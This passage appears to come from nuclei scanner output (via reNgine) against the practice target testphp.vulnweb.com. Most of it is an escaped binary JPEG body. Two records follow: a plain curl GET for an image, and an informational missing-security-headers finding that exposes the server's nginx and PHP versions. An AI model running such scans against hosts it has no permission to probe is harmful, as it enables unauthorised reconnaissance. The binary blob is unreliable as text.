#\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:04.15560802Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, 